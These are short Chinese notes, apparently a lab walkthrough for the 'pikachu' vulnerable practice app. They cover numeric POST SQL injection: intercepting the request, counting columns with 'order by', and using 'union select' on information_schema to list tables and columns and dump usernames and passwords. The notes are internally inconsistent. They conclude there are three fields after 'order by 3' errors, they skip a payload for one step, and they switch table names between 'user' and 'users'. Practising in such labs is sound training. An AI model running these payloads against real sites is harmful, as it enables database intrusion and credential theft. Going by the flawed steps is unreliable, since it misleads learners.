数字型注入POST
POST注入的方法:抓包然后在id后面(可注入参数后面)添加注入sql语句,添加好后放包(Forward)
mysq联合查询
先判断字段数
注入order by 2
返回正常
注入order by 3
报错
说明字段数为3
判断回显位
注入union select 1,2
说明字段1和2都是回显位
查询库名和用户名
查表名
注入 union select table_name,2 from information_schema.tables where table_schema=‘pikachu’
查字段名
注入union select column_name,2 from information_schema.columns where table_name=‘user’
查账号密码
注入union select username,password from users